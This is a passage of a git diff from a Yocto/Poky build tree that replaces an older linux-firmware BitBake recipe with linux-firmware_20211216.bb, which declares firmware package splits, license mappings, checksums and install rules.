-RDEPENDS_${PN}-ibt-hw-37.8 = "${PN}-ibt-license" -RDEPENDS_${PN}-ibt-11-5 = "${PN}-ibt-license" -RDEPENDS_${PN}-ibt-12-16 = "${PN}-ibt-license" -RDEPENDS_${PN}-ibt-17 = "${PN}-ibt-license" -RDEPENDS_${PN}-ibt-20 = "${PN}-ibt-license" -RDEPENDS_${PN}-ibt-misc = "${PN}-ibt-license" - -ALLOW_EMPTY_${PN}-ibt= "1" -ALLOW_EMPTY_${PN}-ibt-misc = "1" - -LICENSE_${PN}-i915 = "Firmware-i915" -LICENSE_${PN}-i915-license = "Firmware-i915" -FILES_${PN}-i915-license = "${nonarch_base_libdir}/firmware/LICENSE.i915" -FILES_${PN}-i915 = "${nonarch_base_libdir}/firmware/i915" -RDEPENDS_${PN}-i915 = "${PN}-i915-license" - -LICENSE_${PN}-ice = "Firmware-ice" -LICENSE_${PN}-ice-license = "Firmware-ice" -FILES_${PN}-ice-license = "${nonarch_base_libdir}/firmware/LICENSE.ice" -FILES_${PN}-ice = "${nonarch_base_libdir}/firmware/intel/ice" -RDEPENDS_${PN}-ice = "${PN}-ice-license" - -FILES_${PN}-adsp-sst-license = "${nonarch_base_libdir}/firmware/LICENCE.adsp_sst" -LICENSE_${PN}-adsp-sst = "Firmware-adsp_sst" -LICENSE_${PN}-adsp-sst-license = "Firmware-adsp_sst" -FILES_${PN}-adsp-sst = "${nonarch_base_libdir}/firmware/intel/dsp_fw*" -RDEPENDS_${PN}-adsp-sst = "${PN}-adsp-sst-license" - -# For QAT -LICENSE_${PN}-qat = "Firmware-qat" -LICENSE_${PN}-qat-license = "Firmware-qat" -FILES_${PN}-qat-license = "${nonarch_base_libdir}/firmware/LICENCE.qat_firmware" -FILES_${PN}-qat = "${nonarch_base_libdir}/firmware/qat*.bin" -RDEPENDS_${PN}-qat = "${PN}-qat-license" - -# For QCOM VPU/GPU and SDM845 -LICENSE_${PN}-qcom-license = "Firmware-qcom" -FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt" -FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*" -FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*" -FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*" -FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*" -FILES_${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*" -FILES_${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*" -FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a300_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw" -FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.*" -FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*" -FILES_${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.* ${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*" -FILES_${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*" -FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*" -FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*" -FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn" -FILES_${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*" -FILES_${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*" -RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-vpu-1.0 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-vpu-2.0 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-adreno-a650 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-adreno-a660 = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-sm8250-audio = "${PN}-qcom-license" -RDEPENDS_${PN}-qcom-sm8250-compute = "${PN}-qcom-license" - -FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio" - -# For Amlogic VDEC -LICENSE_${PN}-amlogic-vdec = "Firmware-amlogic_vdec" -FILES_${PN}-amlogic-vdec-license = "${nonarch_base_libdir}/firmware/LICENSE.amlogic_vdec" -FILES_${PN}-amlogic-vdec = "${nonarch_base_libdir}/firmware/meson/vdec/*" -RDEPENDS_${PN}-amlogic-vdec = "${PN}-amlogic-vdec-license" - -# For other firmwares -# Maybe split out to separate packages when needed. -LICENSE_${PN} = "\ - Firmware-Abilis \ - & Firmware-agere \ - & Firmware-amdgpu \ - & Firmware-amd-ucode \ - & Firmware-amlogic_vdec \ - & Firmware-atmel \ - & Firmware-ca0132 \ - & Firmware-cavium \ - & Firmware-chelsio_firmware \ - & Firmware-cw1200 \ - & Firmware-dib0700 \ - & Firmware-e100 \ - & Firmware-ene_firmware \ - & Firmware-fw_sst_0f28 \ - & Firmware-go7007 \ - & Firmware-hfi1_firmware \ - & Firmware-i2400m \ - & Firmware-ibt_firmware \ - & Firmware-it913x \ - & Firmware-IntcSST2 \ - & Firmware-kaweth \ - & Firmware-moxa \ - & Firmware-myri10ge_firmware \ - & Firmware-nvidia \ - & Firmware-OLPC \ - & Firmware-ath9k-htc \ - & Firmware-phanfw \ - & Firmware-qat \ - & Firmware-qcom \ - & Firmware-qla1280 \ - & Firmware-qla2xxx \ - & Firmware-r8a779x_usb3 \ - & Firmware-radeon \ - & Firmware-ralink_a_mediatek_company_firmware \ - & Firmware-ralink-firmware \ - & Firmware-imx-sdma_firmware \ - & Firmware-siano \ - & Firmware-tda7706-firmware \ - & Firmware-ti-connectivity \ - & Firmware-ti-keystone \ - & Firmware-ueagle-atm4-firmware \ - & Firmware-wl1251 \ - & Firmware-xc4000 \ - & Firmware-xc5000 \ - & Firmware-xc5000c \ - & WHENCE \ -" - -FILES_${PN}-license += "${nonarch_base_libdir}/firmware/LICEN*" -FILES_${PN} += "${nonarch_base_libdir}/firmware/*" -RDEPENDS_${PN} += "${PN}-license" -RDEPENDS_${PN} += "${PN}-whence-license" - -# Make linux-firmware depend on all of the split-out packages. -# Make linux-firmware-iwlwifi depend on all of the split-out iwlwifi packages. -# Make linux-firmware-ibt depend on all of the split-out ibt packages. -python populate_packages_prepend () { - firmware_pkgs = oe.utils.packages_filter_out_system(d) - d.appendVar('RRECOMMENDS_linux-firmware', ' ' + ' '.join(firmware_pkgs)) - - iwlwifi_pkgs = filter(lambda x: x.find('-iwlwifi-') != -1, firmware_pkgs) - d.appendVar('RRECOMMENDS_linux-firmware-iwlwifi', ' ' + ' '.join(iwlwifi_pkgs)) - - ibt_pkgs = filter(lambda x: x.find('-ibt-') != -1, firmware_pkgs) - d.appendVar('RRECOMMENDS_linux-firmware-ibt', ' ' + ' '.join(ibt_pkgs)) -} - -# Firmware files are generally not ran on the CPU, so they can be -# allarch despite being architecture specific -INSANE_SKIP = "arch" diff --git a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20211216.bb b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20211216.bb new file mode 100644 index 0000000000..92b6ff5157 --- /dev/null +++ b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20211216.bb @@ -0,0 +1,1067 @@ +SUMMARY = "Firmware files for use with Linux kernel" +HOMEPAGE = "https://www.kernel.org/" +DESCRIPTION = "Linux firmware is a package distributed alongside the Linux kernel \ +that contains firmware binary blobs necessary for partial or full functionality \ +of certain hardware devices." +SECTION = "kernel" + +LICENSE = "\ + Firmware-Abilis \ + & Firmware-adsp_sst \ + & Firmware-agere \ + & Firmware-amdgpu \ + & Firmware-amd-ucode \ + & Firmware-amlogic_vdec \ + & Firmware-atheros_firmware \ + & Firmware-atmel \ + & Firmware-broadcom_bcm43xx \ + & Firmware-ca0132 \ + & Firmware-cavium \ + & Firmware-chelsio_firmware \ + & Firmware-cw1200 \ + & Firmware-cypress \ + & Firmware-dib0700 \ + & Firmware-e100 \ + & Firmware-ene_firmware \ + & Firmware-fw_sst_0f28 \ + & Firmware-go7007 \ + & Firmware-GPLv2 \ + & Firmware-hfi1_firmware \ + & Firmware-i2400m \ + & Firmware-i915 \ + & Firmware-ibt_firmware \ + & Firmware-ice \ + & Firmware-it913x \ + & Firmware-iwlwifi_firmware \ + & Firmware-IntcSST2 \ + & Firmware-kaweth \ + & Firmware-Lontium \ + & Firmware-Marvell \ + & Firmware-moxa \ + & Firmware-myri10ge_firmware \ + & Firmware-netronome \ + & Firmware-nvidia \ + & Firmware-OLPC \ + & Firmware-ath9k-htc \ + & Firmware-phanfw \ + & Firmware-qat \ + & Firmware-qcom \ + & Firmware-qla1280 \ + & Firmware-qla2xxx \ + & Firmware-qualcommAthos_ar3k \ + & Firmware-qualcommAthos_ath10k \ + & Firmware-r8a779x_usb3 \ + & Firmware-radeon \ + & Firmware-ralink_a_mediatek_company_firmware \ + & Firmware-ralink-firmware \ + & Firmware-rtlwifi_firmware \ + & Firmware-imx-sdma_firmware \ + & Firmware-siano \ + & Firmware-tda7706-firmware \ + & Firmware-ti-connectivity \ + & Firmware-ti-keystone \ + & Firmware-ueagle-atm4-firmware \ + & Firmware-via_vt6656 \ + & Firmware-wl1251 \ + & Firmware-xc4000 \ + & Firmware-xc5000 \ + & Firmware-xc5000c \ + & WHENCE \ +" + +LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ + file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \ + file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \ + file://LICENSE.amdgpu;md5=d357524f5099e2a3db3c1838921c593f \ + file://LICENSE.amd-ucode;md5=3c5399dc9148d7f0e1f41e34b69cf14f \ + file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \ + file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \ + file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \ + file://LICENCE.broadcom_bcm43xx;md5=3160c14df7228891b868060e1951dfbc \ + file://LICENCE.ca0132;md5=209b33e66ee5be0461f13d31da392198 \ + file://LICENCE.cadence;md5=009f46816f6956cfb75ede13d3e1cee0 \ + file://LICENCE.cavium;md5=c37aaffb1ebe5939b2580d073a95daea \ + file://LICENCE.chelsio_firmware;md5=819aa8c3fa453f1b258ed8d168a9d903 \ + file://LICENCE.cw1200;md5=f0f770864e7a8444a5c5aa9d12a3a7ed \ + file://LICENCE.cypress;md5=48cd9436c763bf873961f9ed7b5c147b \ + file://LICENSE.dib0700;md5=f7411825c8a555a1a3e5eab9ca773431 \ + file://LICENCE.e100;md5=ec0f84136766df159a3ae6d02acdf5a8 \ + file://LICENCE.ene_firmware;md5=ed67f0f62f8f798130c296720b7d3921 \ + file://LICENCE.fw_sst_0f28;md5=6353931c988ad52818ae733ac61cd293 \ + file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \ + file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ + file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \ + file://LICENCE.i2400m;md5=14b901969e23c41881327c0d9e4b7d36 \ + file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \ + file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \ + file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \ + file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ + file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \ + file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \ + file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \ + file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \ + file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \ + file://LICENCE.mediatek;md5=7c1976b63217d76ce47d0a11d8a79cf2 \ + file://LICENCE.moxa;md5=1086614767d8ccf744a923289d3d4261 \ + file://LICENCE.myri10ge_firmware;md5=42e32fb89f6b959ca222e25ac8df8fed \ + file://LICENCE.Netronome;md5=4add08f2577086d44447996503cddf5f \ + file://LICENCE.nvidia;md5=4428a922ed3ba2ceec95f076a488ce07 \ + file://LICENCE.NXP;md5=58bb8ba632cd729b9ba6183bc6aed36f \ + file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \ + file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \ + file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \ + file://LICENCE.qat_firmware;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ + file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \ + file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \ + file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \ + file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \ + file://LICENSE.QualcommAtheros_ath10k;md5=cb42b686ee5f5cb890275e4321db60a8 \ + file://LICENCE.r8a779x_usb3;md5=4c1671656153025d7076105a5da7e498 \ + file://LICENSE.radeon;md5=68ec28bacb3613200bca44f404c69b16 \ + file://LICENCE.ralink_a_mediatek_company_firmware;md5=728f1a85fd53fd67fa8d7afb080bc435 \ + file://LICENCE.ralink-firmware.txt;md5=ab2c269277c45476fb449673911a2dfd \ + file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \ + file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \ + file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \ + file://LICENCE.tda7706-firmware.txt;md5=835997cf5e3c131d0dddd695c7d9103e \ + file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \ + file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \ + file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \ + file://LICENCE.via_vt6656;md5=e4159694cba42d4377a912e78a6e850f \ + file://LICENCE.wl1251;md5=ad3f81922bb9e197014bb187289d3b5b \ + file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \ + file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \ + file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \ + file://WHENCE;md5=79f477f9d53eedee5a65b45193785963 \ + " + +# These are not common licenses, set NO_GENERIC_LICENSE for them +# so that the license files will be copied from fetched source +NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENCE.Abilis" +NO_GENERIC_LICENSE[Firmware-adsp_sst] = "LICENCE.adsp_sst" +NO_GENERIC_LICENSE[Firmware-agere] = "LICENCE.agere" +NO_GENERIC_LICENSE[Firmware-amdgpu] = "LICENSE.amdgpu" +NO_GENERIC_LICENSE[Firmware-amd-ucode] = "LICENSE.amd-ucode" +NO_GENERIC_LICENSE[Firmware-amlogic_vdec] = "LICENSE.amlogic_vdec" +NO_GENERIC_LICENSE[Firmware-atheros_firmware] = "LICENCE.atheros_firmware" +NO_GENERIC_LICENSE[Firmware-atmel] = "LICENSE.atmel" +NO_GENERIC_LICENSE[Firmware-broadcom_bcm43xx] = "LICENCE.broadcom_bcm43xx" +NO_GENERIC_LICENSE[Firmware-ca0132] = "LICENCE.ca0132" +NO_GENERIC_LICENSE[Firmware-cadence] = "LICENCE.cadence" +NO_GENERIC_LICENSE[Firmware-cavium] = "LICENCE.cavium" +NO_GENERIC_LICENSE[Firmware-chelsio_firmware] = "LICENCE.chelsio_firmware" +NO_GENERIC_LICENSE[Firmware-cw1200] = "LICENCE.cw1200" +NO_GENERIC_LICENSE[Firmware-cypress] = "LICENCE.cypress" +NO_GENERIC_LICENSE[Firmware-dib0700] = "LICENSE.dib0700" +NO_GENERIC_LICENSE[Firmware-e100] = "LICENCE.e100" +NO_GENERIC_LICENSE[Firmware-ene_firmware] = "LICENCE.ene_firmware" +NO_GENERIC_LICENSE[Firmware-fw_sst_0f28] = "LICENCE.fw_sst_0f28" +NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007" +NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2" +NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware" +NO_GENERIC_LICENSE[Firmware-i2400m] = "LICENCE.i2400m" +NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915" +NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware" +NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice" +NO_GENERIC_LICENSE[Firmware-IntcSST2] = "LICENCE.IntcSST2" +NO_GENERIC_LICENSE[Firmware-it913x] = "LICENCE.it913x" +NO_GENERIC_LICENSE[Firmware-iwlwifi_firmware] = "LICENCE.iwlwifi_firmware" +NO_GENERIC_LICENSE[Firmware-kaweth] = "LICENCE.kaweth" +NO_GENERIC_LICENSE[Firmware-Lontium] = "LICENSE.Lontium" +NO_GENERIC_LICENSE[Firmware-Marvell] = "LICENCE.Marvell" +NO_GENERIC_LICENSE[Firmware-mediatek] = "LICENCE.mediatek" +NO_GENERIC_LICENSE[Firmware-moxa] = "LICENCE.moxa" +NO_GENERIC_LICENSE[Firmware-myri10ge_firmware] = "LICENCE.myri10ge_firmware" +NO_GENERIC_LICENSE[Firmware-netronome] = "LICENCE.Netronome" +NO_GENERIC_LICENSE[Firmware-nvidia] = "LICENCE.nvidia" +NO_GENERIC_LICENSE[Firmware-OLPC] = "LICENCE.OLPC" +NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware" +NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw" +NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware" +NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom" +NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280" +NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx" +NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k" +NO_GENERIC_LICENSE[Firmware-qualcommAthos_ath10k] = "LICENSE.QualcommAtheros_ath10k" +NO_GENERIC_LICENSE[Firmware-r8a779x_usb3] = "LICENCE.r8a779x_usb3" +NO_GENERIC_LICENSE[Firmware-radeon] = "LICENSE.radeon" +NO_GENERIC_LICENSE[Firmware-ralink_a_mediatek_company_firmware] = "LICENCE.ralink_a_mediatek_company_firmware" +NO_GENERIC_LICENSE[Firmware-ralink-firmware] = "LICENCE.ralink-firmware.txt" +NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt" +NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano" +NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware" +NO_GENERIC_LICENSE[Firmware-tda7706-firmware] = "LICENCE.tda7706-firmware.txt" +NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity" +NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone" +NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware" +NO_GENERIC_LICENSE[Firmware-via_vt6656] = "LICENCE.via_vt6656" +NO_GENERIC_LICENSE[Firmware-wl1251] = "LICENCE.wl1251" +NO_GENERIC_LICENSE[Firmware-xc4000] = "LICENCE.xc4000" +NO_GENERIC_LICENSE[Firmware-xc5000] = "LICENCE.xc5000" +NO_GENERIC_LICENSE[Firmware-xc5000c] = "LICENCE.xc5000c" +NO_GENERIC_LICENSE[WHENCE] = "WHENCE" + +PE = "1" + +SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz" + +SRC_URI[sha256sum] = "eeddb4e6bef31fd1a3757f12ccc324929bbad97855c0b9ec5ed780f74de1837d" + +inherit allarch + +CLEANBROKEN = "1" + +do_compile() { + : +} + +do_install() { + oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install + cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/ +} + + +PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \ + ${PN}-mt7601u-license ${PN}-mt7601u \ + ${PN}-radeon-license ${PN}-radeon \ + ${PN}-marvell-license ${PN}-pcie8897 ${PN}-pcie8997 \ + ${PN}-sd8686 ${PN}-sd8688 ${PN}-sd8787 ${PN}-sd8797 ${PN}-sd8801 \ + ${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \ + ${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \ + ${PN}-vt6656-license ${PN}-vt6656 \ + ${PN}-rs9113 ${PN}-rs9116 \ + ${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \ + ${PN}-rtl8168 \ + ${PN}-cypress-license \ + ${PN}-broadcom-license \ + ${PN}-bcm-0bb4-0306 \ + ${PN}-bcm43143 \ + ${PN}-bcm43236b \ + ${PN}-bcm43241b0 \ + ${PN}-bcm43241b4 \ + ${PN}-bcm43241b5 \ + ${PN}-bcm43242a \ + ${PN}-bcm4329 \ + ${PN}-bcm4329-fullmac \ + ${PN}-bcm4330 \ + ${PN}-bcm4334 \ + ${PN}-bcm43340 \ + ${PN}-bcm4335 \ + ${PN}-bcm43362 \ + ${PN}-bcm4339 \ + ${PN}-bcm43430 \ + ${PN}-bcm43430a0 \ + ${PN}-bcm43455 \ + ${PN}-bcm4350 \ + ${PN}-bcm4350c2 \ + ${PN}-bcm4354 \ + ${PN}-bcm4356 \ + ${PN}-bcm4356-pcie \ + ${PN}-bcm43569 \ + ${PN}-bcm43570 \ + ${PN}-bcm4358 \ + ${PN}-bcm43602 \ + ${PN}-bcm4366b \ + ${PN}-bcm4366c \ + ${PN}-bcm4371 \ + ${PN}-bcm4373 \ + ${PN}-bcm43xx \ + ${PN}-bcm43xx-hdr \ + ${PN}-atheros-license ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k \ + ${PN}-gplv2-license ${PN}-carl9170 \ + ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-ath11k ${PN}-qca \ + \ + ${PN}-imx-sdma-license ${PN}-imx-sdma-imx6q ${PN}-imx-sdma-imx7d \ + \ + ${PN}-iwlwifi-license ${PN}-iwlwifi \ + ${PN}-iwlwifi-135-6 \ + ${PN}-iwlwifi-3160-7 ${PN}-iwlwifi-3160-8 ${PN}-iwlwifi-3160-9 \ + ${PN}-iwlwifi-3160-10 ${PN}-iwlwifi-3160-12 ${PN}-iwlwifi-3160-13 \ + ${PN}-iwlwifi-3160-16 ${PN}-iwlwifi-3160-17 \ + ${PN}-iwlwifi-6000-4 ${PN}-iwlwifi-6000g2a-5 ${PN}-iwlwifi-6000g2a-6 \ + ${PN}-iwlwifi-6000g2b-5 ${PN}-iwlwifi-6000g2b-6 \ + ${PN}-iwlwifi-6050-4 ${PN}-iwlwifi-6050-5 \ + ${PN}-iwlwifi-7260 \ + ${PN}-iwlwifi-7265 \ + ${PN}-iwlwifi-7265d ${PN}-iwlwifi-8000c ${PN}-iwlwifi-8265 \ + ${PN}-iwlwifi-9000 \ + ${PN}-iwlwifi-misc \ + ${PN}-ibt-license ${PN}-ibt \ + ${PN}-ibt-11-5 ${PN}-ibt-12-16 ${PN}-ibt-hw-37-7 ${PN}-ibt-hw-37-8 \ + ${PN}-ibt-17 \ + ${PN}-ibt-20 \ + ${PN}-ibt-misc \ + ${PN}-i915-license ${PN}-i915 \ + ${PN}-ice-license ${PN}-ice \ + ${PN}-adsp-sst-license ${PN}-adsp-sst \ + ${PN}-bnx2-mips \ + ${PN}-liquidio \ + ${PN}-nvidia-license \ + ${PN}-nvidia-tegra-k1 ${PN}-nvidia-tegra \ + ${PN}-nvidia-gpu \ + ${PN}-netronome-license ${PN}-netronome \ + ${PN}-qat ${PN}-qat-license \ + ${PN}-qcom-license \ + ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \ + ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \ + ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a530 \ + ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \ + ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \ + ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \ + ${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \ + ${PN}-lt9611uxc ${PN}-lontium-license \ + ${PN}-whence-license \ + ${PN}-license \ + " + +# For atheros +LICENSE_${PN}-ar9170 = "Firmware-atheros_firmware" +LICENSE_${PN}-ath6k = "Firmware-atheros_firmware" +LICENSE_${PN}-ath9k = "Firmware-atheros_firmware" +LICENSE_${PN}-atheros-license = "Firmware-atheros_firmware" + +FILES_${PN}-atheros-license = "${nonarch_base_libdir}/firmware/LICENCE.atheros_firmware" +FILES_${PN}-ar9170 = " \ + ${nonarch_base_libdir}/firmware/ar9170*.fw \ +" +FILES_${PN}-ath6k = " \ + ${nonarch_base_libdir}/firmware/ath6k \ +" +FILES_${PN}-ath9k = " \ + ${nonarch_base_libdir}/firmware/ar9271.fw \ + ${nonarch_base_libdir}/firmware/ar7010*.fw \ + ${nonarch_base_libdir}/firmware/htc_9271.fw \ + ${nonarch_base_libdir}/firmware/htc_7010.fw \ + ${nonarch_base_libdir}/firmware/ath9k_htc/htc_7010-1.4.0.fw \ + ${nonarch_base_libdir}/firmware/ath9k_htc/htc_9271-1.4.0.fw \ +" + +RDEPENDS_${PN}-ar9170 += "${PN}-atheros-license" +RDEPENDS_${PN}-ath6k += "${PN}-atheros-license" +RDEPENDS_${PN}-ath9k += "${PN}-atheros-license" + +# For carl9170 +LICENSE_${PN}-carl9170 = "Firmware-GPLv2" +LICENSE_${PN}-gplv2-license = "Firmware-GPLv2" + +FILES_${PN}-gplv2-license = "${nonarch_base_libdir}/firmware/GPL-2" +FILES_${PN}-carl9170 = " \ + ${nonarch_base_libdir}/firmware/carl9170*.fw \ +" + +RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license" + +# For QualCommAthos +LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k" +LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k" +LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k" +LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k" +LICENSE_${PN}-qca = "Firmware-qualcommAthos_ath10k" + +FILES_${PN}-ar3k-license = "${nonarch_base_libdir}/firmware/LICENSE.QualcommAtheros_ar3k" +FILES_${PN}-ar3k = " \ + ${nonarch_base_libdir}/firmware/ar3k \ +" + +FILES_${PN}-ath10k-license = "${nonarch_base_libdir}/firmware/LICENSE.QualcommAtheros_ath10k" +FILES_${PN}-ath10k = " \ + ${nonarch_base_libdir}/firmware/ath10k \ +" + +FILES_${PN}-ath11k = " \ + ${nonarch_base_libdir}/firmware/ath11k \ +" + +FILES_${PN}-qca = " \ + ${nonarch_base_libdir}/firmware/qca \ +" + +RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license" +RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license" +RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license" +RDEPENDS_${PN}-qca += "${PN}-ath10k-license" + +# For ralink +LICENSE_${PN}-ralink = "Firmware-ralink-firmware" +LICENSE_${PN}-ralink-license = "Firmware-ralink-firmware" + +FILES_${PN}-ralink-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink-firmware.txt" 